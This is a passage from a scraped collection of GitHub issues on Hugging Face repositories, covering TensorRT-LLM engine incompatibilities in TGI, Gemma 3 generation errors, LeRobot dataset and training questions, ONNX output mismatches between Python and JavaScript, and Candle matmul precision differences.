using version: `ghcr.io/huggingface/text-generation-inference:3.3.4-trtllm`\n\nHowever, this version uses TensorRT-LLM v0.17.0.post1, while the latest optimum-nvidia version ([[v0.1.0b9](https://github.com/huggingface/optimum-nvidia/releases/tag/v0.1.0b9)]) uses TensorRT-LLM 0.16.0.\n\nWhen I try to launch TGI with my engine built using optimum-nvidia, I get the following error:\n```\nroot@5ddf177112d7:/usr/local/tgi/bin# /usr/local/tgi/bin/text-generation-launcher --model-id \"/engines/llama-3.2-3b-instruct-optimum/GPU/engines\" --tokenizer-name \"/models/llama-3.2-3b-instruct\" --executor-worker \"/usr/local/tgi/bin/executorWorker\"\n2025-07-27T06:16:40.717109Z INFO text_generation_backends_trtllm: backends/trtllm/src/main.rs:293: Successfully retrieved tokenizer /models/llama-3.2-3b-instruct\n[2025-07-27 06:16:40.717] [info] [ffi.hpp:164] Initializing TGI - TensoRT-LLM Backend (v0.17.0.post1)\n[2025-07-27 06:16:40.747] [info] [ffi.hpp:173] [FFI] Detected 1 Nvidia GPU(s)\n[2025-07-27 06:16:40.758] [info] [backend.cpp:22] Detected single engine deployment, using leader mode\n[TensorRT-LLM][INFO] Engine version 0.16.0 found in the config file, assuming engine(s) built by new builder API.\n[TensorRT-LLM][INFO] Initializing MPI with thread mode 3\n[TensorRT-LLM][INFO] Initialized MPI\n[TensorRT-LLM][INFO] Refreshed the MPI local session\n[TensorRT-LLM][INFO] MPI size: 1, MPI local size: 1, rank: 0\n[TensorRT-LLM][INFO] Rank 0 is using GPU 0\n[TensorRT-LLM][INFO] TRTGptModel maxNumSequences: 64\n[TensorRT-LLM][INFO] TRTGptModel maxBatchSize: 64\n[TensorRT-LLM][INFO] TRTGptModel maxBeamWidth: 1\n[TensorRT-LLM][INFO] TRTGptModel maxSequenceLen: 4096\n[TensorRT-LLM][INFO] TRTGptModel maxDraftLen: 0\n[TensorRT-LLM][INFO] TRTGptModel mMaxAttentionWindowSize: (4096) * 28\n[TensorRT-LLM][INFO] TRTGptModel enableTrtOverlap: 0\n[TensorRT-LLM][INFO] TRTGptModel normalizeLogProbs: 1\n[TensorRT-LLM][INFO] TRTGptModel maxNumTokens: 262144\n[TensorRT-LLM][INFO] TRTGptModel maxInputLen: 4095 = maxSequenceLen - 1 since chunked context is enabled\n[TensorRT-LLM][INFO] TRTGptModel If model type is encoder, maxInputLen would be reset in trtEncoderModel to maxInputLen: 4096 = maxSequenceLen.\n[TensorRT-LLM][INFO] Capacity Scheduler Policy: MAX_UTILIZATION\n[TensorRT-LLM][INFO] Context Chunking Scheduler Policy: None\n[TensorRT-LLM][INFO] Loaded engine size: 6981 MiB\n[TensorRT-LLM][ERROR] IRuntime::deserializeCudaEngine: Error Code 6: API Usage Error (The engine plan file is not compatible with this version of TensorRT, expecting library version 10.8.0.43 got\n..)\nError: Runtime(\"[TensorRT-LLM][ERROR] Assertion failed: Failed to deserialize cuda engine. (/usr/src/text-generation-inference/target/release/build/text-generation-backends-trtllm-479f10d4b58ebb37/out/build/_deps/trtllm-src/cpp/tensorrt_llm/runtime/tllmRuntime.cpp:239)\")\n```\n\n**Problem 2: Building Engine with trtllm-build**\nI attempted to build my engine directly using `trtllm-build`, but when launching TGI, I encounter this error:\n\n```\n2025-07-27T06:15:55.033318Z INFO text_generation_backends_trtllm: backends/trtllm/src/main.rs:293: Successfully retrieved tokenizer /models/llama-3.2-3b-instruct\n[2025-07-27 06:15:55.034] [info] [ffi.hpp:164] Initializing TGI - TensoRT-LLM Backend (v0.17.0.post1)\n[2025-07-27 06:15:55.101] [info] [ffi.hpp:173] [FFI] Detected 1 Nvidia GPU(s)\nterminate called after throwing an instance of 'nlohmann::json_abi_v3_11_3::detail::parse_error'\n what(): [json.exception.parse_error.101] parse error at line 1, column 1: attempting to parse an empty input; check that your input string or stream contains the expected JSON\n```\n\nThe error suggests it cannot find a JSON file, but the `config.json` file is present in the engine directory:\n\n```bash\nroot@5ddf177112d7:/usr/local/tgi/bin# ls -l /engines/llama-3.2-3b-instruct/\ntotal 3033324\n-rw-r--r-- 1 root root 7848 Jul 26 17:21 config.json\n-rw-r--r-- 1 root root 3106108276 Jul 26 17:21 rank0.engine\n```\n\n**Environment:**\n- Model: llama-3.2-3b-instruct\n- TGI Version: 3.3.4-trtllm\n- TensorRT-LLM Version: v0.17.0.post1\n\nCould you please help resolve these compatibility issues or provide guidance on the correct workflow for using TensorRT-LLM with TGI?\n\n### Information\n\n- [x] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [x] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\n**1/ Build your engine :** \n`docker run --rm -it --gpus=1 --shm-size=1g -v \"/home/jyce/unmute.mcp/volumes/llm-tgi/engines:/engines\" -v \"/home/jyce/unmute.mcp/volumes/llm-tgi/models:/models\" huggingface/optimum-nvidia:v0.1.0b8-py310 bash\n`\n```\n optimum-cli export trtllm \\\n --tp=1 \\\n --pp=1 \\\n --max-batch-size", "url": "https://github.com/huggingface/text-generation-inference/issues/3304", "state": "open", "labels": [], "created_at": "2025-07-27T06:24:29Z", "updated_at": "2025-10-06T09:56:29Z", "comments": 4, "user": "psykokwak-com" }, { "repo": "huggingface/transformers", "number": 39705, "title": "[i18n-] Translating docs to ", "body": "\n\nHi!\n\nLet's bring the documentation to all the Bengali-speaking community \ud83c\udf10 (currently 0 out of 267 complete)\n\nWho would want to translate? Please follow the \ud83e\udd17 [TRANSLATING guide](https://github.com/huggingface/transformers/blob/main/docs/TRANSLATING.md). Here is a list of the files ready for translation. Let us know in this issue if you'd like to translate any, and we'll add your name to the list.\n\nSome notes:\n\n* Please translate using an informal tone (imagine you are talking with a friend about transformers \ud83e\udd17).\n* Please translate in a gender-neutral way.\n* Add your translations to the folder called `` inside the [source folder](https://github.com/huggingface/transformers/tree/main/docs/source).\n* Register your translation in `/_toctree.yml`; please follow the order of the [English version](https://github.com/huggingface/transformers/blob/main/docs/source/en/_toctree.yml).\n* Once you're finished, open a pull request and tag this issue by including #issue-number in the description, where issue-number is the number of this issue. Please ping @stevhliu for review.\n* \ud83d\ude4b If you'd like others to help you with the translation, you can also post in the \ud83e\udd17 [forums](https://discuss.huggingface.co/).\n\n## Get Started section\n\n- [x] [index.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/index.md) https://github.com/huggingface/transformers/pull/20180\n- [ ] [quicktour.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/quicktour.md) (waiting for initial PR to go through)\n- [ ] [installation.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/installation.md).\n\n## Tutorial section\n- [ ] [pipeline_tutorial.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/pipeline_tutorial.md)\n- [ ] [autoclass_tutorial.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/autoclass_tutorial.md)\n- [ ] [preprocessing.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/preprocessing.md)\n- [ ] [training.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/training.md)\n- [ ] [accelerate.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/accelerate.md)\n- [ ] [model_sharing.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/model_sharing.md)\n- [ ] [multilingual.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/multilingual.md)\n\n\n", "url": "https://github.com/huggingface/transformers/issues/39705", "state": "open", "labels": [ "WIP" ], "created_at": "2025-07-27T06:18:20Z", "updated_at": "2025-07-27T11:58:32Z", "comments": 1, "user": "ankitdutta428" }, { "repo": "huggingface/transformers", "number": 39699, "title": "No flag to support Conditional Parameter Loading for gemma-3n-E2B models in transformer", "body": "### System Info\n\nHi,\nWhile a lot has been mentioned about gemma-3n-E2B and gemma-3n-E4B about the COnditional parameter loading and reduced memory loading\nThere is no configuration currently visible in transformers for supporting that.\nIs it possible to get the related configuration/code/documentation to make it work to get an actual lower memory model?\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nimport torch\nfrom transformers import AutoProcessor, AutoModelForImageTextToText\n\nGEMMA_MODEL_ID = \"google/gemma-3n-E2B-it\"\n\nprint(\"Loading processor\")\nprocessor = AutoProcessor.from_pretrained(GEMMA_MODEL_ID)\n\nprint(\"Loadind model\")\nmodel = AutoModelForImageTextToText.from_pretrained(\n GEMMA_MODEL_ID, torch_dtype=\"auto\", device_map=None).to(\"cpu\")\n\nThere is no flag for doing Conditional parameter Loading or PLE\n\n### Expected behavior\n\nSome flag using which Conditional Parameter Loading can be enabled and save on the memory", "url": "https://github.com/huggingface/transformers/issues/39699", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-26T18:08:00Z", "updated_at": "2025-09-03T08:02:58Z", "comments": 2, "user": "aakashgaur01" }, { "repo": "huggingface/tokenizers", "number": 1835, "title": "Can you provide binary releases?", "body": "It seems that binaries are not available in recent versions. \ntokenizers module is essential for the latest models, and it would be preferable if it could be easily installed. \nSetting up a Rust compilation environment can be cumbersome, and it's almost impossible to do so offline. \nCould we possibly distribute something in binary form via PyPI or here?", "url": "https://github.com/huggingface/tokenizers/issues/1835", "state": "closed", "labels": [], "created_at": "2025-07-26T16:07:12Z", "updated_at": "2025-09-08T13:49:52Z", "comments": 4, "user": "goldenmomonga" }, { "repo": "huggingface/lerobot", "number": 1599, "title": "Evaluation results of VLA models on MetaWorld Benchmark", "body": "Thank you for this excellent work! I noticed that the paper mentions evaluation results of VLA models on MetaWorld. However, in the original papers for Octo and \u03c0\u2080, results are only reported on the LIBERO benchmark, and I haven\u2019t found their MetaWorld evaluations in other related studies. I\u2019d like to know how Octo and \u03c0\u2080 were specifically evaluated on MetaWorld in this work, including implementation details (e.g., for \u03c0\u2080, was it full finetune or only fine-tuning the action expert?). Additionally, the MetaWorld MT50 dataset on LeRobot appears to lack data for one task\u2014is this the real data used for fine-tuning VLAs?", "url": "https://github.com/huggingface/lerobot/issues/1599", "state": "open", "labels": [ "enhancement", "question", "policies", "simulation" ], "created_at": "2025-07-26T11:18:54Z", "updated_at": "2025-08-12T09:17:44Z", "user": "Zooy138" }, { "repo": "huggingface/transformers", "number": 39686, "title": "CRITICAL ISSUE REPORT! GEMMA 3 1B CANNOT RUN!", "body": "How to reproduce:\n\nRun this:\n\n```\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\n\n# Load the base model in FP16\nbase_model = AutoModelForCausalLM.from_pretrained(\n \"unsloth/gemma-3-1b-pt\",\n low_cpu_mem_usage=True,\n return_dict=True,\n torch_dtype=torch.float16,\n device_map=\"mps\",\n)\n\n# Load and configure the tokenizer\ntokenizer = AutoTokenizer.from_pretrained(\"unsloth/gemma-3-1b-pt\", trust_remote_code=True)\n\n# Generate the text\nprompt = \"Once upon a time\"\ninputs = tokenizer(prompt, return_tensors=\"pt\").to(base_model.device)\noutputs = base_model.generate(inputs.input_ids, max_length=50)\n# Decode the generated text\ngenerated_text = tokenizer.decode(outputs[0], skip_special_tokens=True)\nprint(generated_text)\n```\n\nError:\n\n```\n(yuna) yuki@yuki AI % python gener.py\n k_out_updated = k_out_shifted.index_copy(2, update_position, key_states)\nTraceback (most recent call last):\n File \"/Users/yuki/Documents/AI/gener.py\", line 19, in \n outputs = base_model.generate(inputs.input_ids, max_length=50)\n File \"/opt/anaconda3/envs/yuna/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/opt/anaconda3/envs/yuna/lib/python3.10/site-packages/transformers/generation/utils.py\", line 2623, in generate\n result = self._sample(\n File \"/opt/anaconda3/envs/yuna/lib/python3.10/site-packages/transformers/generation/utils.py\", line 3649, in _sample\n next_tokens = torch.multinomial(probs, num_samples=1).squeeze(1)\nRuntimeError: probability tensor contains either `inf`, `nan` or element < 0\n```\n\nSystem: macOS Tahoe, MacBook Pro M1 with 16 GB of RAM", "url": "https://github.com/huggingface/transformers/issues/39686", "state": "closed", "labels": [], "created_at": "2025-07-26T00:22:27Z", "updated_at": "2025-07-28T12:07:50Z", "comments": 5, "user": "yukiarimo" }, { "repo": "huggingface/lerobot", "number": 1592, "title": "Time spent on imitation learning training (ACT)", "body": "I use colab to make a policy with ACT model.\nThe note said, \"Training with the ACT policy for 100,000 steps typically takes about 1.5 hours on an NVIDIA A100 GPU,\", and I used A100 model in colab too.\nHowever the expected time is 13 hours, which seems to be much longer than the standard value of 1.5 hours. \nIs it correct that it takes this much time in a colab environment? \nI used dataset from \nhttps://huggingface.co/datasets/initie/test_pick \nand there is no problem with the operation of the training code.", "url": "https://github.com/huggingface/lerobot/issues/1592", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-25T06:36:35Z", "updated_at": "2025-10-08T08:32:32Z", "user": "initia1013" }, { "repo": "huggingface/datasets", "number": 7699, "title": "Broken link in documentation for \"Create a video dataset\"", "body": "The link to \"the [WebDataset documentation](https://webdataset.github.io/webdataset).\" is broken. \nhttps://huggingface.co/docs/datasets/main/en/video_dataset#webdataset \n\n\"Image\"", "url": "https://github.com/huggingface/datasets/issues/7699", "state": "open", "labels": [], "created_at": "2025-07-24T19:46:28Z", "updated_at": "2025-07-25T15:27:47Z", "comments": 1, "user": "cleong110" }, { "repo": "huggingface/transformers", "number": 39637, "title": "[BUG] Run 111B+ Teacher distributed inference and 8B Student distributed training on multi-node H200 GPUs using the Transformers Trainer without encountering OOM errors?", "body": "Hello, first off, apologies if this information is already available elsewhere. I've searched through the documentation and existing issues but haven't found a clear answer to my question.\n\nI have access to 2 to 4 nodes (16 to 32 GPUs in total), each equipped with 8x140GB H200 GPUs. My objective is to perform large-scale distributed inference using a massive 111B-parameter Teacher model (CohereLabs/c4ai-command-a-03-2025) and simultaneously conduct online knowledge distillation (soft-logit based) from this 111B Teacher model to a smaller 8B Student model (CohereLabs/c4ai-command-r7b-12-2024).\n\nIs there a way to simultaneously run distributed inference for Teacher models larger than 111B and distributed training for Student models in a multi-node setup, utilizing Hugging Face Transformers' Trainer?\n\nThe Transformers version I'm using is v4.51.3. I've observed the use of model = deepspeed.tp_model_init within the def deepspeed_init function in src/transformers/integrations/deepspeed.py. I attempted to apply this code, but it resulted in a torch.distributed.DistBackendError.\n\nI would be very grateful if someone could explain what would be most suitable for my use case. A minimal working example would be the icing on the cake. Surely, if the Open LLM Leaderboard shows that online knowledge distillation (soft-logit) is possible with large models exceeding 111B, there must be a straightforward way to achieve what I want, but I'm unsure how everyone else does it.\n\nFor reference, below is the script I'm currently working with:\n\n`deepspeed --num_nodes 2 --num_gpus 8 \\\n --hostfile $HOSTFILE \\\n --master_addr $MASTER_ADDR \\\n --master_port=62535 \\\n train.py \\\n --teacher CohereLabs/c4ai-command-a-03-2025 \\\n --student CohereLabs/c4ai-command-r7b-12-2024 \\\n --epochs 1 --batch_size 1 --seq_len 4096 --temperature 1.0 --max_samples 150 --lr 1e-6 2>&1 | tee -a \"./train.log\" `\n\n```import deepspeed\nimport torch.distributed as dist\nimport os, math, argparse, warnings, torch, random, multiprocessing as mp\nfrom datasets import load_dataset, concatenate_datasets\nfrom transformers import (AutoTokenizer, AutoModelForCausalLM,\n PreTrainedTokenizerBase)\nfrom torch.nn.utils.rnn import pad_sequence\nimport torch.nn.functional as F\nfrom datetime import timedelta\nfrom deepspeed.runtime.utils import see_memory_usage\n\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\nos.environ.setdefault(\"NCCL_ASYNC_ERROR_HANDLING\", \"1\")\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\nmp.set_start_method(\"spawn\", force=True)\n\ndef get_args():\n p = argparse.ArgumentParser()\n p.add_argument(\"--teacher\", default=\"\")\n p.add_argument(\"--student\", default=\"\")\n p.add_argument(\"--dataset\", default=\"\")\n p.add_argument(\"--split\", default=\"train\")\n p.add_argument(\"--epochs\", type=int, default=1)\n p.add_argument(\"--batch_size\", type=int, default=1,\n help=\"per-GPU micro-batch\")\n p.add_argument(\"--seq_len\", type=int, default=4096)\n p.add_argument(\"--temperature\", type=float, default=1.0)\n p.add_argument(\"--lr\", type=float, default=1e-6)\n p.add_argument(\"--max_samples\", type=int, default=0,\n help=\"0=1000 \")\n p.add_argument(\"--local_rank\", type=int, default=-1,\n help=\"deepspeed/torch launcher GPU index\")\n p.add_argument(\"--cache_path\", default=\"\")\n p.add_argument(\"--hf_token\", default=\"\")\n p = deepspeed.add_config_arguments(p)\n return p.parse_args()\n\n\ndef main():\n timeout_seconds = 3600 \n timeout_duration = timedelta(seconds=timeout_seconds)\n dist.init_process_group(\n backend=\"nccl\",\n timeout=timeout_duration \n )\n args = get_args()\n deepspeed.init_distributed()\n rank, world = deepspeed.comm.get_rank(), deepspeed.comm.get_world_size()\n device = torch.device(\"cuda\", deepspeed.comm.get_local_rank())\n # Tokenizer \n tokenizer = AutoTokenizer.from_pretrained(args.student,\n use_fast=True, trust_remote_code=True)\n if tokenizer.pad_token is None:\n tokenizer.pad_token = tokenizer.eos_token\n \n # tokenizer token_id \n tokenizer.eos_token_id = tokenizer.convert_tokens_to_ids(tokenizer.eos_token)\n tokenizer.pad_token_id = tokenizer.convert_tokens_to_ids(tokenizer.pad_token)\n \n \n # Teacher (inference only) \n teacher_model = AutoModelForCausalLM.from_pretrained(\n args.teacher, torch_dtype=torch.bfloat16,\n low_cpu_mem_usage=True,\n trust_remote_code=True, device_map=None, \n cache_dir=args.cache_path,token=args.hf_token) \n \n see_memory_usage(\"After load model\", force=True)\n \n teacher_model.config.eos_token_id = tokenizer.eos_token_id\n teacher_model.config.pad_token_id = tokenizer.pad_token_id\n \n teacher_engine = deepspeed.init_inference(\n teacher_model,\n mp_size=world,\n dtype=torch.bfloat16,\n replace_with_kernel_inject=True, \n replace_method=\"auto\")\n ", "url": "https://github.com/huggingface/transformers/issues/39637", "state": "closed", "labels": [], "created_at": "2025-07-24T15:05:38Z", "updated_at": "2025-09-01T08:03:18Z", "comments": 3, "user": "seona21" }, { "repo": "huggingface/lerobot", "number": 1586, "title": "Real-world deploy on ALOHA Robot", "body": "How could I deploy the policies on the ALOHA robot? And how could I deploy in the real world? ", "url": "https://github.com/huggingface/lerobot/issues/1586", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-07-24T12:52:06Z", "updated_at": "2025-08-21T16:18:26Z", "user": "LogSSim" }, { "repo": "huggingface/diffusers", "number": 11984, "title": "A compatibility issue when using custom Stable Diffusion with pre-trained ControlNets", "body": "I have successfully fine-tuned a Stable Diffusion v1.5 model using the Dreambooth script, and the results are excellent. However, I've encountered a compatibility issue when using this custom model with pre-trained ControlNets. Since the Dreambooth process modifies the U-Net weights, the original ControlNet is no longer aligned with the fine-tuned model, leading to a significant degradation in control and image quality.\n\nMy goal is to find a way to make them compatible again. It's important to clarify that I am trying to avoid a full, separate fine-tuning of the ControlNet on my custom model. That process is data- and resource-intensive, which defeats the purpose of a lightweight personalization method like Dreambooth. I have tried modifying the train_dreambooth.py script to incorporate ControlNet, but results have been consistently poor.\n\nIs there a dedicated script or a recommended workflow in diffusers to fine-tune a Stable Diffusion with ControlNet via Dreambooth? Any guidance or pointers would be greatly appreciated. Thanks a lot!", "url": "https://github.com/huggingface/diffusers/issues/11984", "state": "closed", "labels": [], "created_at": "2025-07-24T09:16:55Z", "updated_at": "2025-07-24T15:15:20Z", "comments": 6, "user": "ScienceLi1125" }, { "repo": "huggingface/lighteval", "number": 868, "title": "How to calculate perplexity from an OpenAI compatible API", "body": "Hello,\n\nI'm new to LightEval. I want to use LightEval to evaluate an LLM model that is served via an API. The API is OpenAI compatible. It also returns logprobs for each token. Is there a built-in function to evaluate the perplexity score? I'm asking because I see that it\u2019s not implemented.\n\nhttps://github.com/huggingface/lighteval/blob/d805f9fa0a84da9ca4c0c6a638bbed149a7012a3/src/lighteval/models/litellm_model.py#L322\n\nAny help or guidance is greatly appreciated. Thanks.", "url": "https://github.com/huggingface/lighteval/issues/868", "state": "open", "labels": [], "created_at": "2025-07-24T07:27:05Z", "updated_at": "2025-07-24T07:27:05Z", "user": "mrtpk" }, { "repo": "huggingface/lerobot", "number": 1580, "title": "Environment_State in act and SmolVLA policy", "body": "Hi, Thanks for the awesome work!\nI have been noticing a variable called observation.environment_state in the act policy. What is exactly the feature environment_state. Thanks!", "url": "https://github.com/huggingface/lerobot/issues/1580", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-24T03:32:31Z", "updated_at": "2025-10-08T13:09:33Z", "user": "kasiv008" }, { "repo": "huggingface/transformers.js", "number": 1379, "title": "Why Do I Get Different Outputs in Python and JavaScript for the Same ONNX Model?", "body": "Hi ,\n\nI'm running inference on the same ONNX model (t5-small-new) using both Python and JavaScript (via ONNX Runtime). However, I'm noticing that the outputs are different between the two environments, even though the inputs and model are the same. The output of the Python code is correct while JS is not accurate.\n\nPython Code:\n```\nfrom optimum.onnxruntime import ORTModelForSeq2SeqLM\nfrom transformers import AutoTokenizer\n\nmodel = ORTModelForSeq2SeqLM.from_pretrained(\n \"t5-small-new\",\n use_cache=True \n)\n\ntokenizer = AutoTokenizer.from_pretrained(\"t5-small-new\")\n\ninputs = tokenizer(\"My Input\", return_tensors=\"pt\")\noutputs = model.generate(**inputs)\n\nprint(\"Prediction:\", tokenizer.decode(outputs[0], skip_special_tokens=True))\n```\n\n\nJS code:\n```\nconst inputText = \"My Input\";\n\nconst tokenizer = await window.AutoTokenizer.from_pretrained(\"t5-small-new\");\nconst model = await window.AutoModelForSeq2SeqLM.from_pretrained(\"t5-small-new\", {\n dtype: \"fp32\",\n device: \"wasm\",\n});\n\nconst encoded = await tokenizer(inputText, {\n return_tensors: \"pt\",\n});\n\nconst output = await model.generate({\n input_ids: encoded.input_ids,\n attention_mask: encoded.attention_mask,\n use_cache: true,\n});\n\nconst decoded = await tokenizer.decode(output[0], {\n skip_special_tokens: true,\n});\n\nconsole.log(\"JS Prediction:\", decoded);\n\n```\n\n\nMy model uses `decoder_model_merged.onnx`, `encoder_model.onnx`, and `decoder_model.onnx`. \n\nCould you guide me on what is happening and why I get different results?", "url": "https://github.com/huggingface/transformers.js/issues/1379", "state": "closed", "labels": [ "question" ], "created_at": "2025-07-23T20:13:57Z", "updated_at": "2025-08-29T23:43:21Z", "user": "mahdin75" }, { "repo": "huggingface/transformers", "number": 39618, "title": "SageAttention for attention implementation?", "body": "### Feature request\n\nI've noticed it's been a while now, but transformers still only has flash attention as the fastest attention backend for calls like these: \n\n\"Image\"\n\nAre there any plans to add sageattention as well? \n\n### Motivation\n\nIt's become increasingly involved to have to monkey patch sage attention support for every new model that comes out, and for older models that used older versions of transformers, I've had to do unholy things like this:\n\n\"Image\"\n\n\n### Your contribution\n\nI have an example of a patch I had to do so I will upload that here\n\n[llama_nar.py.txt](https://github.com/user-attachments/files/21393926/llama_nar.py.txt)", "url": "https://github.com/huggingface/transformers/issues/39618", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-07-23T19:10:47Z", "updated_at": "2025-07-25T12:30:37Z", "comments": 4, "user": "Many0therFunctions" }, { "repo": "huggingface/diffusers", "number": 11977, "title": "how to load a finetuned model especially during validation phase", "body": "\"Image\"\nAs the above, I have finetuned the model and want to validate it, but the given demo which is train_dreambooth_sd3.py still uses \n\"pipeline = StableDiffusion3Pipeline.from_pretrained(\n args.pretrained_model_name_or_path,\n transformer=transformer,\n text_encoder=text_encoder_one,\n text_encoder_2=text_encoder_two,\n text_encoder_3=text_encoder_three,\n ) \" .\n\nI wonder why it still load from args.pretrained_model_name_or_path as it has saved the finetuned model in the save_path which is \"os.path.join(args.output_dir, f\"checkpoint-{global_step}\")\".\n\nso, how to how to load the finetuned model during validation phase?\n\nAnother confusion, what is the difference between \" StableDiffusion3Pipeline.from_pretrained() \" and \"SD3Transformer2DModel.from_pretrained\" as the following:\n\n\"Image\"\n\n ", "url": "https://github.com/huggingface/diffusers/issues/11977", "state": "open", "labels": [], "created_at": "2025-07-23T11:54:16Z", "updated_at": "2025-07-24T09:19:11Z", "user": "micklexqg" }, { "repo": "huggingface/lerobot", "number": 1579, "title": "Is there a video backend supporting nondestructive encoding?", "body": "I saved images during recording through not deletng folder `images`. When I try to compare the first frame.png in `images` folder and dataset=make_dataset(config)'s first image, I found the saved png file is nondestructive. But the image I got by lerobot is not.\n\nHow I find:\nin `def save_episode` \n```\n # img_dir = self.root / \"images\"\n # if img_dir.is_dir():\n # shutil.rmtree(self.root / \"images\")\n```\nThis has been moved in latest version. now:\n\n```\n def encode_episode_videos(self, episode_index: int) -> None:\n ...\n encode_video_frames(img_dir, video_path, self.fps, overwrite=True)\n shutil.rmtree(img_dir)\n```\n\nI saved some images through recording with one channel filled with zero. Then read the saved png through cv2, it showed it has a 0-filled channel.\n\nThen I try to check whether I can get the same image through lerobot\nso I did this in train.py\n```\nraw_dataloader = torch.utils.data.DataLoader(\n dataset,\n num_workers=cfg.num_workers,\n batch_size=cfg.batch_size,\n shuffle=False,\n sampler=sampler,\n pin_memory=device.type == \"cuda\",\n drop_last=False,\n )\nimage_tensor=peek_batch[\"observation.images.side_depth\"][0]\nimage_np = (image_tensor * 255).permute(1, 2, 0).cpu().numpy().astype(np.uint8)\n```\nSadly,`image_np` is really different from real png, it doesn't have a 0-filled channel, and its average data shows larger.\n", "url": "https://github.com/huggingface/lerobot/issues/1579", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-07-23T08:38:39Z", "updated_at": "2025-08-12T09:22:26Z", "user": "milong26" }, { "repo": "huggingface/candle", "number": 3032, "title": "`matmul` (and others) Precision issues between Candle & PyTorch", "body": "We noticed there's some precision discrepancy in matrix multiplication and the linear layer between between Candle and PyTorch. This matters a lot when reproducing LLMs originated from PyTorch into Candle. We used the `hf_hub::api::Api` to get the safetensors from the hub and for testing the precision issues for each modules independently. This also occurs for the `BF16` dtype in `Cuda`.\n\nHere's a shortened list of tests (for brevity) between `candle_core::tensor::Tensor::matmul` and `torch.matmul`\n```\n\u274c test_0: MSE=0.0000000004096404, MAE=0.00001550 (dims: 2048x256, dtype: F32, device: Cpu)\n\u274c test_1: MSE=0.0000000003628351, MAE=0.00001453 (dims: 2048x256, dtype: F32, device: Cpu)\n...\n\u274c test_48: MSE=0.0000000000824194, MAE=0.00000633 (dims: 512x1024, dtype: F32, device: Cpu)\n\u274c test_49: MSE=0.0000000003840639, MAE=0.00001534 (dims: 2048x256, dtype: F32, device: Cpu)\n```\n\nWe did notice `candle_nn::Embedding` performed at 0-tolerance (tested indirectly), which probably means the the loaded weights themselves are working precisely.\n\nHave you guys tried validating your implementation with the PyTorch at 0-tolerance (within the same CPU/GPU architecture)? Is there any proper way to mitigate this? We need it for our implementation. Thank you.", "url": "https://github.com/huggingface/candle/issues/3032", "state": "closed", "labels": [], "created_at": "2025-07-23T04:07:08Z", "updated_at": "2025-09-27T21:25:51Z", "comments": 4, "user": "andrew-shc" }, { "repo": "huggingface/lerobot", "number": 1578, "title": "Lerobot metaworld dataset only provides 49 tasks", "body": "https://huggingface.co/datasets/lerobot/metaworld_mt50\n\nThere are only 49 tasks and \"Push the puck to a goal\" task repeates twice", "url": "https://github.com/huggingface/lerobot/issues/1578", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2025-07-23T04:03:17Z", "updated_at": "2025-08-12T09:23:12Z", "user": "chenkang455" }, { "repo": "huggingface/lerobot", "number": 1577, "title": "test failed after training SVLA", "body": "I collected 76 sets of data and used the same calibration file as during collection. However, after training for 24k steps, the model obtained was unable to complete the grasping task during inference. Can anyone help me deal with the problem?\n[dataset](https://huggingface.co/datasets/Xiaoyan97/orange_block_pickplace)\n", "url": "https://github.com/huggingface/lerobot/issues/1577", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-23T03:59:26Z", "updated_at": "2025-08-12T09:23:26Z", "user": "Liu-Xiaoyan97" }, { "repo": "huggingface/lerobot", "number": 1576, "title": "Multiple Dataset training", "body": "How to train multiple lerobot dataset? is there any function I can use it", "url": "https://github.com/huggingface/lerobot/issues/1576", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-07-23T03:46:03Z", "updated_at": "2025-10-10T09:30:06Z", "user": "JustinKai0527" }, { "repo": "huggingface/transformers", "number": 39596, "title": "Does transformers support python3.13 -- disable-gil or python3.14 free threading?", "body": "Does transformers support python3.13 -- disable-gil or python3.14 free threading?\nI got an error when trying to install transformers on these two python versions.", "url": "https://github.com/huggingface/transformers/issues/39596", "state": "closed", "labels": [], "created_at": "2025-07-23T02:34:03Z", "updated_at": "2025-08-30T08:02:54Z", "comments": 2, "user": "SoulH-qqq" }, { "repo": "huggingface/transformers.js", "number": 1374, "title": "nanoVLM support", "body": "### Question\n\nI would like to know if there is any plan to support models built with nanoVLM [https://github.com/huggingface/nanoVLM], thanks.", "url": "https://github.com/huggingface/transformers.js/issues/1374", "state": "open", "labels": [ "question" ], "created_at": "2025-07-22T11:43:57Z", "updated_at": "2025-07-23T09:02:15Z", "user": "sbrzz" }, { "repo": "huggingface/diffusers", "number": 11971, "title": "What is the minimum memory requirement for model training?", "body": "Hello, I would like to try training an SDXL model using my own dataset. What is the minimum memory size required for the model?", "url": "https://github.com/huggingface/diffusers/issues/11971", "state": "closed", "labels": [], "created_at": "2025-07-22T07:52:28Z", "updated_at": "2025-07-22T08:26:27Z", "user": "WWWPPPGGG" }, { "repo": "huggingface/transformers", "number": 39565, "title": "Model forward execution in full eager mode?", "body": "I know there is a flag `attn_implementation` which could trigger specialized attention kernel implementation. Besides this, does everything run in native PyTorch eager mode? Does `transformers` have any other custom op or kernel?\n```python\nmodel = 